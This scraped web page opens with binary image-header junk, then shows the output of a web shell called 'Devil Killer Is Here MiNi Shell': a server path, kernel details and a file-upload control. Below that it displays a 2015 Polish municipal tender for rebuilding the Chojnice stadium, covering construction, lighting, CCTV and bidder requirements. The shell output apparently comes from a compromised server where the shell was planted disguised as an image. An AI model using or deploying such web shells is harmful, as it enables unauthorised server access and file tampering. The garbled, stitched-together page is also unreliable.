JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150410/81172-N-2015.html

<p class="kh_header"><b>Chojnice: Przebudowa urządzeń i obiektów na stadionie miejskim przy ul. Mickiewicza w Chojnicach</b><br>
<b>Numer ogłoszenia: 81172 - 2015; data zamieszczenia: 10.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Stary Rynek 1, 89-600 Chojnice, woj. pomorskie, tel. 052 3971800, faks 052 3972194.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miastochojnice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa urządzeń i obiektów na stadionie miejskim przy ul. Mickiewicza w Chojnicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Budynek przy ul. Jeziornej
1a. W ramach rozbudowy budynku przewiduje się wykonanie stanowiska spikerskiego w formie wykusza wykonanego w systemowej konstrukcji PCV;
W ramach przebudowy przewiduje się dostosowanie funkcjonalne obiektu do zmienionych potrzeb a wymagających wykonania  następujących robót:
- rozbiórki części ścian działowych i wykonania nowych zgodnie z założonym układem funkcjonalnym,
- rozbiórki posadzek piwnic i wykonanie nowych wraz z warstwami podkładowymi,
- wyburzenia w miejscu projektowanych otworów okiennych i zamurowania miejsc po likwidowanych
- wymianę stolarki okiennej i drzwiowej w zakresie określonym projektem,
- wykonanie dociepleń wewnętrznych i zewnętrznych ścian budynku,
- wykonanie izolacji akustycznej pomieszczenia prób zespołu muzycznego,
- budowa nowych kominów z prefabrykowanych elementów keramzytobetonowych,
- demontaż i montaż nowych balustrad schodowych,
- wykonanie okładzin schodowych z płytek gresowych,
- ułożenie wykładzin termozgrzewalnych na wylewce samopoziomującej,
- wykonanie tynków na dociepleniach wewnętrznych i przecierek na ścianach pozostałych,
- malowanie wewnętrzne ścian i sufitów,
- docieplenie stropodachu wełną mineralną,
- pokrycie dachu papą termozgrzewalną
- wymiana rynien i rur spustowych, obróbek blacharskich  - grubość blachy 1,5 mm,
- montaż zewnętrznej drabiny aluminiowej,
- wykonanie elewacji budynku,
- montaż systemowego daszku szklanego nad wejściem.

1b. Demontaż wewnętrznych instalacji sanitarnych i wykonanie nowych:
- wody i kanalizacji,
- centralnego ogrzewania,
- gazu,
- wentylacji i klimatyzacji.
 
1c. Instalacje elektryczne wewnątrzbudynkowe
-demontaż istniejącej instalacji wraz z osprzętem
-roboty ogólnobudowlane związane z budową instalacji elektrycznych wewnątrzbudynkowych
-budowa WLZ zasilania rezerwowego
-montaż tablicy licznikowo rozdzielczej z układem ręcznego przełącznika sieć-agregat i głównym  wyłącznikiem ppoż
-budowa instalacji oświetlenia podstawowego
-budowa instalacji oświetlenia ewakuacyjnego
-budowa instalacji zasilania gniazd
-budowa instalacji zasilania wypustów urządzeń klimatyzacji, wentylacji itp.
-budowa WLZ do zasilania tablicy rozdzielczej urządzeń teletechnicznych
-montaż tablicy rozdzielczej zasilania urządzeń teletechnicznych
-montaż szafy dystrybucyjnej zasilania awaryjnego UPS systemów teletechnicznych
-pomiary i badania wykonanych instalacji elektrycznych
-badania funkcjonalne wykonanych instalacji elektrycznych

1d. Instalacje teletechniczne wewnątrzbudynkowe
-roboty ogólnobudowlane związane z budową instalacji teletechnicznych wewnątrzbudynkowych
-budowa instalacji sygnalizacji pożaru SAP
-budowa instalacji domofonowej
-montaż szafy dystrybucyjnej nagłośnienia obiektu (serwerownia)
-montaż szafy dystrybucyjnej monitoringu wizyjnego oraz systemu kontroli dostępu (serwerownia)
-montaż instalacji monitoringu wewnętrznego
-montaż lokalnego systemu kontroli dostępu do serwerowni
-montaż wyposażenia i urządzeń aktywnych w serwerowni
-budowa okablowania strukturalnego sieci LAN monitoringu
-montaż terminali obsługowych w pomieszczeniu ochrony i policji
-montaż wyposażenia i urządzeń aktywnych w pomieszczeniu ochrony i policji
-montaż terminala obsługowego nagłośnienia w pomieszczeniu spikera
-pomiary i badania wykonanych instalacji teletechnicznych
-badania funkcjonalne wykonanych instalacji teletechnicznych

Uwaga w ofercie należy uwzględnić : 
- montaż okablowania instalacji antenowej (4 przewody na dach i rozprowadzenia do 8 przewodów  w kanałach razem z siecią LAN po budynku) 
- przeniesienie serwera systemu sprzedaży biletów z budynku klubowego przy ul. Mickiewicza do budynku wielofunkcyjnego przy ul. Jeziornej

2.OŚWIETLENIE PŁYTY GŁÓWNEJ NA STADIONIE

1.Zakres zadania budowy systemu oświetlenia płyty głównej:
-budowa sieci kablowej zasilającej szafy dystrybucyjno-sterujące
-budowa sieci kablowej sterującej
-posadowienie szaf dystrybucyjno-zasilających
-wykonanie fundamentów studniowych pod maszty oświetleniowe
-montaż masztów oświetleniowych
-montaż projektorów i instalacji oświetleniowej na masztach
-wykonanie stanowiska postojowego dla agregatu z ogrodzeniem
-posadowienie i podłączenie agregatu prądotwórczego
-posadowienie złączy kablowych
-wprowadzenie przyłączy kablowych zasilania rezerwowego do budynków
-montaż tablicy sterującej oświetleniem
-montaż układów przełącznika sieć-agregat w obiektach kubaturowych
-pomiary linii kablowych zasilających i sterujących
-uruchomienie systemu zasilania oświetlenia ze sprawdzeniem funkcjonalnym
-uruchomienie systemu zasilania obiektów kubaturowych ze sprawdzeniem funkcjonalnym
-pomiary skuteczności ochrony przeciwporażeniowej
-pomiary natężenia oświetlenia płyty boiska dla scenariuszy sterowania

2.Szczegółowe wymagania wobec opraw oświetleniowych
Ze względu na lokalne uwarunkowania geologiczne, istniejące zagospodarowanie terenu oraz wymagania Art.5.ust.1, pkt 1, lit. f oraz pkt 2, lit. a ustawy z dnia 07.07.1994 r.  Prawo budowlane  Dz. U. Nr 89  poz. 414 z pózn. zm. zastosowane oprawy powinny charakteryzować się następującymi parametrami eksploatacyjno-technicznymi: WG OPISU W SIWZ
3.Szczegółowe wymagania wobec masztów oświetleniowych - WG OPISU W SIWZ
4.Szczegółowe wymagania wobec agregatu
Agregat mobilny zasilania oświetlenia płyty stadionu oraz obiektów kubaturowych powinien posiadać następujące minimalne parametry techniczne oraz wymagania eksploatacyjne: WG OPISU W SIWZ
Wyposażenie wymagane
-sterownik lokalny z wyświetlaczem lcd 
-ręczna pompa do spustu oleju 
-wyłącznik sterownika
-filtr paliwa z separatorem wody
-szynowe przyłącze odbioru mocy 
-wyłącznik układu ogrzewania silnika na płycie czołowej 
-wyłącznik główny agregatu
-wanna retencyjna
-cewka podnapięciowa (ster. ręczne) lub wzrostowa (ster. automatyczne) wyłącznika głównego  
-czujnik wycieku w wannie retencyjnej  
-cyfrowy 3 fazowy AVR
-sygnalizator dźwiękowy awarii  
-odłącznik akumulatora  
-przycisk awaryjnego zatrzymania
-gniazdo odbioru pełnej mocy
-akumulator rozruchowy 
-rozdzielnica elektryczna z gniazdami i zabezpieczeniami (wg ustaleń)  
-ładowarka akumulatora (ster. automatyczne)
-zabezpieczenie różnicowo-prądowe
-grzałka silnika sterowana termostatem  
-kontrola niskiego ciśnienia oleju  
-pomiar ciśnienia oleju
-kontrola wysokiej temperatury silnika  
-pomiar temperatury silnika
-elektroniczny regulator obrotów  
-rama ze zbiornikiem
-zamykany wlew paliwa na zewnątrz obudowy  
-pomiar poziomu paliwa
-filtr paliwa z separatorem wody  
-tłumik spalin z kompensatorem drgań
-wibroizolatory drgań silnika i prądnicy  
-obudowa wyciszona, wykonana z blachy Al.-Zn
-uchwyty transportowe.
Uwaga
Agregat po uruchomieniu, regulacji i badaniach systemu oświetlenia powinien zostać przekazany w gotowości do pracy, z pełnym zbiornikiem paliwa.
Przyczepka do przewozu agregatu - WG OPISU W SIWZ
Uwaga
Przyczepa do przewozu agregatu powinna zostać zarejestrowana na użytkownika i zostać przekazana w gotowości do poruszania się po drogach publicznych.
Oświetlenie winno spełniać wymagania techniczne dla stadionów I ligi zgodnie z wymaganiami podręcznika licencyjnego PZPN dla I ligi na lata 2014 2015 

3.MONITORING I NAGŁOŚNIENIE 
Przedmiotem zamówienia jest budowa systemu rejestracji imprez masowych oraz nagłośnienia na stadionie Chojniczanka w Chojnicach ul. Mickiewicza 

1.Zakres zadania budowy systemu utrwalania imprez masowych rejestracji audio i video obejmuje:
-demontaż okablowania i urządzeń istniejącego systemu rejestracji imprez masowych
-budowa wielootworowej kanalizacji kablowej teletechnicznej
-budowa światłowodowego okablowania magistralnego monitoringu wizyjnego w kanalizacji kablowej
-budowa symetrycznego okablowania rozdzielczego monitoringu wizyjnego w kanalizacji kablowej
-budowa przyłączy elektrycznych zasilania urządzeń monitoringu
-budowa symetrycznego okablowania systemu rejestracji dźwięku w kanalizacji kablowej
-budowa i przebudowa konstrukcji wsporczych zewnętrznych urządzeń monitoringu
- montaż zewnętrznych urządzeń monitoringu na przygotowanych konstrukcjach wsporczych
-budowa i przebudowa konstrukcji wsporczych zewnętrznych urządzeń systemu rejestracji dźwięku
- montaż zewnętrznych urządzeń systemu rejestracji dźwięku na przygotowanych konstrukcjach wsporczych
-badania i pomiary kablowej infrastruktury światłowodowej monitoringu
-badania i pomiary kabli symetrycznych sytemu monitoringu
-badania i pomiary kabli zasilających sytemu monitoringu
-badania i pomiary kabli symetrycznych sytemu rejestracji dźwięku
-badania i pomiary funkcjonalne systemu rejestracji video na zgodność z wymaganiami projektu i rozporządzenia
-badania i pomiary funkcjonalne systemu rejestracji audio na zgodność z wymaganiami projektu i rozporządzenia

2.Zakres zadania budowy systemu nagłośnienia obejmuje:
-demontaż okablowania i urządzeń istniejącego systemu nagłośnienia
-budowa symetrycznego okablowania systemu nagłośnienia w kanalizacji kablowej
-budowa i przebudowa konstrukcji wsporczych zewnętrznych urządzeń systemu nagłośnienia
- montaż zewnętrznych urządzeń systemu nagłośnienia na przygotowanych konstrukcjach wsporczych
-badania i pomiary kabli symetrycznych sytemu nagłośnienia
-badania i pomiary funkcjonalne systemu nagłośnienia

Monitoring winien spełniać wymagania ustawy o bezpieczeństwie imprez masowych z 20.03.2009 r. z późn. zm.  Dz. U. Nr 62 poz.504  oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji  w sprawie sposobu utrwalania przebiegu imprezy masowej z 10.01.2011 r. Dz. U Nr 16 poz.73 
Serwisowanie wbudowanych urządzeń w okresie gwarancji wykonuje Wykonawca.
4.Uporządkowanie terenu po wykonaniu robót oraz odtworzenie zieleni.
5.Zgodnie z art. 29 ust. 4 pkt 4 zamawiający określa wymagania związane z realizacją zamówienia dotyczące zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę osób wykonujących czynności w trakcie realizacji zamówienia w ten sposób, że Wykonawca lub podwykonawca ma obowiązek zatrudnić na podstawie umowy o pracę co najmniej na czas realizacji zamówienia czyli na okres wykonania umowy, w pełnym wymiarze czasu pracy 4 osoby wymienione w rozdziale  10 pkt 1.3) tj. osoby posiadające uprawnienia do kierowania robotami budowlanymi  w specjalnościach:
a)konstrukcyjno-budowlanej bez ograniczeń - kierownik budowy
b)elektrycznej - kierownik robót
c)sanitarnej - kierownik robót
d)telekomunikacyjnej - kierownik robót
Wykonawca zobowiązany będzie udokumentować spełnienie powyższych wymagań wypełniając Załącznik Nr 6  do SIWZ - Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia. Ponadto wybrany wykonawca przed podpisaniem umowy zobowiązany będzie przedstawić zamawiającemu umowy o pracę zawarte z w/w osobami (oryginały umów do wglądu lub kopia poświadczona przez właściwy organ administracji lub notariusza).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.00.00-9, 45.31.00.00-3, 45.31.10.00-0, 45.31.50.00-8, 45.31.23.10-3, 45.31.53.00-1, 45.31.51.00-9, 45.31.61.00-6, 45.31.57.00-5, 45.31.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  60.000,00 zł (słownie: sześćdziesiąttysięcyzłotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. 
Wykonawca musi przedstawić w wykazie że wykonał co najmniej: 
2 roboty branży budowlanej (w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie), o wartości minimum  1.000.000,00 zł każda;
1 robotę branży elektrycznej (w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie),  polegającą na wykonaniu zewnętrznego oświetlenia boiska sportowego lub stadionu lub parkingu lub kortu tenisowego lub innego terenu otwartego  o wartości minimum 1.000.000 zł ; 
1 robotę branży teletechnicznej  (w okresie ostatnich 5 lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie),  polegającą na montażu  i uruchomieniu monitoringu kamerowego CCTV wraz z instalacją systemu kontroli ruchu osobowego             i identyfikacji kibica na obiektach obsługujących imprezy masowe zgodnie z ustawą o bezpieczeństwie imprez masowych z 20.03.2009 r. z późn. zm. oraz Rozporządzenia Ministra Spraw Wewnętrznych  i Administracji  w sprawie sposobu utrwalania przebiegu imprezy masowej z 10.01.2011 r. o wartości minimum 1.000.000 zł ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. 
wykonawca musi dysponować osobą/mi zdolną/mi do wykonania przedmiotowego zamówienia posiadającą/mi uprawnienia do kierowania robotami budowlanymi (wzór stanowi Załącznik Nr 6 do SIWZ) w specjalnościach:
a)konstrukcyjno-budowlanej bez ograniczeń - kierownik budowy
b)elektrycznej - kierownik robót
c)sanitarnej - kierownik robót
d)telekomunikacyjnej - kierownik robót</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty - posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 3.000.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>udzielą gwarancji na wykonany przedmiot zamówienia na okres minimum 2 lata  licząc od dnia bezusterkowego odbioru przez Zamawiającego wykonanych robót budowlanych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy 
w  następujących przypadkach:
A W zakresie zmiany terminu wykonania:
konieczności wykonania zamówień dodatkowych, uniemożliwiających wykonanie zamówienia podstawowego,
wystąpienia nie zinwentaryzowanych urządzeń podziemnych i związanych 
z tym kolizji, 
z powodu nie przewidzianego braku płynności finansowej u Zamawiającego,
wystąpienie siły wyższej i innych zdarzeń nadzwyczajnych niezależnych od Wykonawcy , 
ujawnienia się wad/braków/błędów w dokumentacji projektowej skutkujących nie możliwością dochowania pierwotnego terminu realizacji umowy
B.W zakresie płatności i innych:
aktualizacji rozwiązań ze względu na postęp technologiczny lub gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
zmiany kolejności wykonania części zamówienia bądź rezygnacji z wykonania części zamówienia,
zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego,
rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.
C.W zakresie innych zmian 
zmiana zakresu robót powierzonego podwykonawcom. 
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
